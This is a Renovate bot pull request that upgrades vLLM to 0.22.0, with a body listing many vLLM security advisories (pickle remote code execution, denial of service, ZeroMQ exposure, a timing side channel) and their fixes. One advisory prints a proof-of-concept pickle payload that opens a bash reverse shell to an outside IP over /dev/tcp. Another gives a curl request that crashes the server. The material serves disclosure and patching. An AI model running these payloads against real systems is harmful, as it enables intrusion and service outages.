
Update dependency vllm to v0.22.0 [SECURITY] - autoclosed#45

Closed
renovate[bot] wants to merge 1 commit into main from renovate/pypi-vllm-vulnerability

Conversation

@renovate renovate Bot commented May 31, 2025

Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package  Change
vllm     ==v0.8.4 → ==0.22.0
vllm     ==v0.6.6 → ==0.22.0
vllm     ==v0.6.4 → ==0.22.0
vllm     ==0.11.0 → ==0.22.0
vllm     ==0.8.4 → ==0.22.0
vllm     ==0.6.6 → ==0.22.0
vllm     ==0.6.4 → ==0.22.0

vLLM denial of service vulnerability

CVE-2024-8768 / GHSA-w2r7-9579-27hf

More information

Details

A flaw was found in the vLLM library. A completions API request with an empty prompt will crash the vLLM API server, resulting in a denial of service.
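
A guard against this class of crash is to reject empty prompts at the API boundary, before they reach the engine. The following is a minimal sketch under that assumption; `validate_prompt` is a hypothetical helper and not necessarily how vLLM fixed the issue.

```python
from typing import Sequence, Union

Prompt = Union[str, Sequence[int]]


def validate_prompt(prompt: Prompt) -> Prompt:
    """Reject empty prompts before they are handed to the engine.

    Hypothetical helper for illustration; not part of vLLM's API.
    """
    if prompt is None or len(prompt) == 0:
        # A server would map this to an HTTP 400 response instead of crashing.
        raise ValueError("prompt must contain at least one character or token")
    return prompt
```

Raising a validation error lets the server answer the offending request with a client error while it keeps serving other requests.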

Severity

  • CVSS Score: 8.7 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator

CVE-2025-24357 / GHSA-rh4j-5rhw-hr54

More information

Details

Description

The vllm/model_executor/weight_utils.py module implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from Hugging Face. It uses the torch.load function, and the weights_only parameter defaults to False. As the security warning at https://pytorch.org/docs/stable/generated/torch.load.html notes, when torch.load loads malicious pickle data, it will execute arbitrary code during unpickling.

Impact

This vulnerability can be exploited to execute arbitrary code and OS commands on the machine of a victim who fetches the pretrained repo remotely.

Note that most models now use the safetensors format, which is not vulnerable to this issue.
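
To illustrate why unpickling untrusted data is dangerous, the sketch below uses only the standard `pickle` module (not `torch.load`) and a harmless stand-in payload. `Payload`, `NoGlobalsUnpickler`, and `restricted_loads` are names invented for this example; the restricted unpickler is only conceptually similar to what `weights_only=True` aims for.

```python
import io
import os
import pickle


class Payload:
    def __reduce__(self):
        # pickle records "call os.getcwd()" and runs it while loading.
        # An attacker would return (os.system, ("<command>",)) instead.
        return (os.getcwd, ())


blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # calls os.getcwd(); no Payload object is rebuilt


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any importable name."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Load plain data only; any pickle that references a callable is rejected."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()
```

Here `pickle.loads(blob)` returns the current working directory, showing that a function chosen by whoever produced the bytes ran during loading, while `restricted_loads(blob)` raises `pickle.UnpicklingError`.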

References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM uses Python 3.12 built-in hash() which leads to predictable hash collisions in prefix cache

CVE-2025-25183 / GHSA-rm76-4mrf-v9r8

More information

Details

Summary

Maliciously constructed prompts can lead to hash collisions, resulting in prefix cache reuse, which can interfere with subsequent responses and cause unintended behavior.

Details

vLLM's prefix caching makes use of Python's built-in hash() function. As of Python 3.12, the behavior of hash(None) has changed to be a predictable constant value. This makes it more feasible for someone to try to exploit hash collisions.

Impact

The impact of a collision would be using cache that was generated using different content. Given knowledge of prompts in use and predictable hashing behavior, someone could intentionally populate the cache using a prompt known to collide with another prompt in use.

Solution

We address this problem by initializing hashes in vllm with a value that is no longer constant and predictable. It will be different each time vllm runs. This restores behavior we got in Python versions prior to 3.12.

Using a hashing algorithm that is less prone to collisions (sha256, for example) would be the best way to avoid the possibility of a collision. However, it would have an impact on both performance and memory footprint. With the current fix, hash collisions may still occur, though they are no longer straightforward to predict.

To give an idea of the likelihood of a collision, for randomly generated hash values (assuming the hash generation built into Python is uniformly distributed), with a cache capacity of 50,000 messages and an average prompt length of 300, a collision will occur on average once every 1 trillion requests.
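
The two options discussed above can be sketched as follows. This is an illustration under assumptions, not vLLM's code: `NONE_HASH`, `block_hash`, and `block_hash_sha256` are hypothetical names, and the chaining scheme is simplified.

```python
import hashlib
import os
from typing import Optional, Sequence

# Per-process random seed standing in for the old, predictable hash(None).
# The name NONE_HASH is an assumption made for this sketch.
NONE_HASH = int.from_bytes(os.urandom(32), byteorder="big")


def block_hash(parent_hash: Optional[int], token_ids: Sequence[int]) -> int:
    """Chain a block's tokens onto its parent's hash using built-in hash()."""
    if parent_hash is None:
        parent_hash = NONE_HASH  # unpredictable start of every hash chain
    return hash((parent_hash, tuple(token_ids)))


def block_hash_sha256(parent_digest: bytes, token_ids: Sequence[int]) -> bytes:
    """Collision-resistant alternative at a higher CPU and memory cost."""
    h = hashlib.sha256(parent_digest)
    for token in token_ids:
        h.update(token.to_bytes(8, "big", signed=True))
    return h.digest()
```

Within one process the seeded hash stays stable, so cache lookups still work, but an outside party cannot precompute which prompts collide because the seed changes on every start.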

References

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM denial of service via outlines unbounded cache on disk

CVE-2025-29770 / GHSA-mgrm-fgjv-mhv8

More information

Details

Impact

The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request.

This issue applies to the V0 engine only. The V1 engine is not affected.

Patches

The fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the VLLM_V0_USE_OUTLINES_CACHE environment variable to 1.
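
An opt-in switch of this kind might be read as shown below. The variable name comes from the advisory; the helper `outlines_cache_enabled` and its exact parsing are assumptions for illustration.

```python
import os
from typing import Mapping


def outlines_cache_enabled(environ: Mapping[str, str] = os.environ) -> bool:
    """Return True only when the operator has explicitly opted in.

    The parsing shown here is an assumption, not vLLM's exact implementation.
    """
    return environ.get("VLLM_V0_USE_OUTLINES_CACHE", "0") == "1"
```

Defaulting to off means an unset or unexpected value never enables the unbounded on-disk cache.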

Workarounds

There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via Mooncake Integration

CVE-2025-29783 / GHSA-x3m8-f7g5-qhm7

More information

Details

Summary

When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP will allow attackers to execute remote code on distributed hosts.

Details

  1. Pickle deserialization vulnerabilities are well documented.
  2. The mooncake pipe is exposed over the network (by design, to enable disaggregated prefilling across distributed environments) using ZMQ over TCP, greatly increasing exploitability. Further, the mooncake integration opens these sockets listening on all interfaces on the host, meaning it cannot be configured to only use a private, trusted network.

Only sender_socket and receiver_ack are allowed to be accessed publicly, while the data actually deserialized by pickle.loads() comes from recv_bytes. Its interface is defined as self.receiver_socket.connect(f"tcp://{d_host}:{d_rank_offset + 1}"), where d_host is decode_host, a locally defined address (192.168.0.139) from mooncake.json (https://github.com/kvcache-ai/Mooncake/blob/main/doc/en/vllm-integration-v0.2.md?plain=1#L36).

  3. The root problem is that recv_tensor() calls _recv_impl, which passes the raw network bytes to pickle.loads(). Additionally, there do not appear to be any controls (network, authentication, etc.) to prevent arbitrary users from sending this payload to the affected service.

Impact

This is a remote code execution vulnerability impacting any deployments using Mooncake to distribute KV across distributed hosts.

Remediation

This issue is resolved by https://github.com/vllm-project/vllm/pull/14228
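
Independently of the linked fix, a general way to avoid this class of bug is to exchange data-only messages that cannot encode callables. The sketch below frames tensor metadata as JSON plus raw bytes; it is an illustration under assumptions, not the approach taken in the pull request, and `encode_message` and `decode_message` are hypothetical names.

```python
import json
import struct
from typing import Tuple


def encode_message(dtype: str, shape: Tuple[int, ...], payload: bytes) -> bytes:
    """Frame = 4-byte big-endian header length + JSON header + raw payload."""
    header = json.dumps({"dtype": dtype, "shape": list(shape)}).encode("utf-8")
    return struct.pack(">I", len(header)) + header + payload


def decode_message(frame: bytes) -> Tuple[str, Tuple[int, ...], bytes]:
    """Parse a frame; JSON parsing yields only data, never callables."""
    if len(frame) < 4:
        raise ValueError("frame too short")
    (header_len,) = struct.unpack(">I", frame[:4])
    if header_len > len(frame) - 4:
        raise ValueError("header length exceeds frame size")
    header = json.loads(frame[4 : 4 + header_len].decode("utf-8"))
    dtype = str(header["dtype"])
    shape = tuple(int(dim) for dim in header["shape"])
    return dtype, shape, frame[4 + header_len :]
```

A format like this still needs network-level controls and authentication, but a malformed frame can at worst raise an exception rather than run attacker-chosen code.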

Severity

  • CVSS Score: 9.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM vulnerable to Denial of Service by abusing xgrammar cache

GHSA-hf3c-wxg2-49q9

More information

Details

Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3

The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
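
The underlying problem is a cache with no upper bound. A bounded, least-recently-used cache is one common mitigation; the sketch below is generic Python and does not reflect the XGrammar or vLLM implementation. `BoundedCache` and `get_or_compile` are hypothetical names.

```python
from collections import OrderedDict
from typing import Callable, Generic, Hashable, TypeVar

K = TypeVar("K", bound=Hashable)
V = TypeVar("V")


class BoundedCache(Generic[K, V]):
    """LRU cache that evicts the oldest entry once max_entries is exceeded."""

    def __init__(self, max_entries: int) -> None:
        if max_entries < 1:
            raise ValueError("max_entries must be positive")
        self._max_entries = max_entries
        self._data: "OrderedDict[K, V]" = OrderedDict()

    def get_or_compile(self, key: K, compile_fn: Callable[[K], V]) -> V:
        if key in self._data:
            self._data.move_to_end(key)  # mark as most recently used
            return self._data[key]
        value = compile_fn(key)
        self._data[key] = value
        if len(self._data) > self._max_entries:
            self._data.popitem(last=False)  # drop the least recently used entry
        return value

    def __len__(self) -> int:
        return len(self._data)
```

This limits the number of entries rather than bytes, so a production cache would likely also need to account for the size of each compiled grammar.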

Patches

Workarounds

There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-24357 Malicious model remote code execution fix bypass with PyTorch < 2.6.0

GHSA-ggpf-24jw-3fcw

More information

Details

Description

GHSA-rh4j-5rhw-hr54 reported a vulnerability where loading a malicious model could result in code execution on the vllm host. The fix, which specified weights_only=True in calls to torch.load(), did not solve the problem on PyTorch versions prior to 2.6.0.

PyTorch has issued a new CVE about this problem: GHSA-53q9-r3pm-6pq6

This means that versions of vLLM using PyTorch before 2.6.0 are vulnerable to this problem.

Background Knowledge

When users install vLLM according to the official manual:
image

the version of PyTorch is pinned in the requirements.txt file:
image

So by default, when a user installs vLLM, PyTorch 2.5.1 is installed with it:
image

CVE-2025-24357 was patched by passing weights_only=True, but this is not secure, because weights_only=True is unsafe in PyTorch 2.5.1 and earlier.

Here, we use this interface to prove that it is not safe.
image

Fix

Update PyTorch to version 2.6.0.

Credit

This vulnerability was found by Ji'an Zhou and Li'shuo Song.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Data exposure via ZeroMQ on multi-node vLLM deployment

CVE-2025-30202 / GHSA-9f8f-2vmf-885j

More information

Details

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcast to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.
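
The difference between binding to all interfaces and binding to one chosen address can be shown with the standard `socket` module. This is a plain TCP sketch, not ZeroMQ or vLLM code; `open_listener` is a hypothetical helper. With ZeroMQ, the analogous choice is between an endpoint such as `tcp://*:<port>` and `tcp://<private-ip>:<port>`.

```python
import socket


def open_listener(host: str, port: int = 0) -> socket.socket:
    """Bind a TCP listener to one explicit IPv4 address.

    Binding to "0.0.0.0" (or "") would listen on every interface, which is
    the behaviour the advisory describes; a private address limits exposure.
    """
    if host in ("", "0.0.0.0", "::"):
        raise ValueError("refusing to bind to all interfaces")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind((host, port))  # port 0 lets the OS pick a free port
        sock.listen()
    except OSError:
        sock.close()
        raise
    return sock
```

Binding to a specific address does not replace a firewall, but it keeps the socket off networks the operator never intended to serve.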

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcast to the tensor parallelism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83

Patches

Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that the port used is random.

References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM Vulnerable to Remote Code Execution via Mooncake Integration

CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5

More information

Details

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM integration with mooncake is vulnerable to remote code execution due to using pickle-based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is similar to GHSA-x3m8-f7g5-qhm7; the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here recv_pyobj() contains an implicit pickle.loads(), which leads to potential RCE.

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via PyNcclPipe Communication Service

CVE-2025-47277 / GHSA-hjq4-87xh-g4fv

More information

Details

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods.

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as the client-side address. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw: it directly processes client-provided data using pickle.loads, creating an unsafe deserialization vulnerability that can lead to remote code execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config=KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
  2. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

The attacker obtains a shell, as shown below:

image

Reporters

This issue was reported independently by three different parties:

  • @​kikayli (Zhuque Lab, Tencent)
  • @​omjeki
  • Russell Bryant (@russellb)

Fix

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


phi4mm: Quadratic Time Complexity in Input Token Processing leads to denial of service

CVE-2025-46560 / GHSA-vc6m-hm49-g9qg

More information

Details

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

Affected component: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code rebuilds the input_ids list on every replacement using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation copies the entire list, costing O(n) per replacement. For k placeholders expanding to m tokens each, the total time becomes O(kmn), which approaches O(n²) in the worst case.

PoC

Test data demonstrates quadratic time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).
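
The growth rate can be checked directly from the figures above. If the runtime grows like n^p, doubling n multiplies the runtime by 2^p, so p can be estimated as log2 of the ratio between consecutive measurements. The snippet reuses the reported data; only the variable name `exponents` is new.

```python
import math

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

# Each input size is double the previous one, so log2(t2 / t1) estimates
# the exponent p in t ~ n^p for that step.
exponents = [math.log2(t2 / t1) for t1, t2 in zip(run_times, run_times[1:])]

for n, p in zip(test_cases[1:], exponents):
    print(f"n={n}: estimated exponent {p:.2f}")
```

The estimates fall between about 1.8 and 2.3, which is what quadratic growth looks like and well short of what exponential growth would produce.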

Impact

Denial of service (DoS): An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

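# Sketch of an O(n) solution. placeholder_lengths is a hypothetical mapping
# from each placeholder token ID to its precomputed expansion length.
def expand_placeholders(input_ids, placeholder_lengths):
    new_input_ids = []
    for token in input_ids:
        if token in placeholder_lengths:
            # extend() appends in amortized O(1) per element, so no full copies.
            new_input_ids.extend([token] * placeholder_lengths[token])
        else:
            new_input_ids.append(token)
    return new_input_ids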

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and prior to 0.8.5, having vLLM integration with mooncake, are vulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack. vLLM instances that do not make use of the mooncake integration are not vulnerable. This issue has been patched in version 0.8.5.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching

CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PagedAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PagedAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
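
To make the chunk-level granularity concrete, the sketch below counts how many leading full chunks of a guessed token sequence match a cached one. It is a simplified model of prefix reuse, not vLLM's implementation, and `matching_prefix_blocks` is a hypothetical function. The more chunks match, the less prefill work remains, which is the signal the TTFT measurement picks up.

```python
from typing import Sequence


def matching_prefix_blocks(
    cached: Sequence[int], guess: Sequence[int], block_size: int
) -> int:
    """Count leading full blocks of `guess` that equal those of `cached`."""
    if block_size < 1:
        raise ValueError("block_size must be positive")
    matched = 0
    limit = min(len(cached), len(guess))
    # Only complete blocks can be reused, so stop before a partial block.
    for start in range(0, limit - block_size + 1, block_size):
        end = start + block_size
        if list(cached[start:end]) != list(guess[start:end]):
            break
        matched += 1
    return matched
```

With a block size of 2, a guess that agrees on the first four tokens reuses two blocks, while a guess that differs in the fourth token reuses only one, so an attacker can refine a guess one chunk at a time.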

Environment
  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
    Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
[Figure: roc_curves_combined_block_2]

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PagedAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Fixes

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM DOS: Remotely kill vllm over http with invalid JSON schema

CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

Summary

Hitting the /v1/completions API with an invalid json_schema as a Guided Param will kill the vllm server.

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with an invalid json_schema, e.g. {"properties":{"reason":{"type": "stsring"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes
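
A server can avoid this failure mode by validating the schema when the request arrives and returning a client error, rather than letting the exception surface inside the engine loop. The sketch below performs only a rough check of `type` names; it is an assumption-laden illustration, not vLLM's fix, and `find_invalid_types` is a hypothetical helper. A real deployment would more likely rely on a full JSON Schema validator.

```python
import json

# Primitive type names defined by JSON Schema.
JSON_SCHEMA_TYPES = {
    "string", "number", "integer", "boolean", "object", "array", "null",
}


def find_invalid_types(schema, path="$"):
    """Return paths whose "type" is not a valid JSON Schema type name."""
    problems = []
    if isinstance(schema, dict):
        declared = schema.get("type")
        if isinstance(declared, str):
            names = [declared]
        elif isinstance(declared, list):
            names = declared
        else:
            names = []  # absent, or a property that happens to be named "type"
        for name in names:
            if not isinstance(name, str) or name not in JSON_SCHEMA_TYPES:
                problems.append(f"{path}.type={name!r}")
        for key, value in schema.items():
            problems.extend(find_invalid_types(value, f"{path}.{key}"))
    elif isinstance(schema, list):
        for index, item in enumerate(schema):
            problems.extend(find_invalid_types(item, f"{path}[{index}]"))
    return problems


guided_json = '{"properties":{"reason":{"type": "stsring"}}}'
problems = find_invalid_types(json.loads(guided_json))
```

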